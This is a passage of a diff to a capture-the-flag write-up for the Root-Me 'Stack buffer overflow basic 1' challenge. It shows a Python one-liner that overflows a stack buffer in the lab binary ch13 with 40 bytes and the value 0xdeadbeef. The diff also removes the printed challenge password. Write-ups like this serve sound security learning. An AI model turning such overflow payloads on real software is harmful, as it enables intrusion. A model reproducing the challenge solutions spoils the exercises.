omar2535/ctf-old/rootme/App-system/Stack buffer overflow basic 1.md

 (python -c 'print("a"*40 + "\xef\xbe\xad\xde")'; cat -) | ./ch13
 ```

-the final answer we get is
+and we get the password!

-`1w4ntm0r3pr0np1s`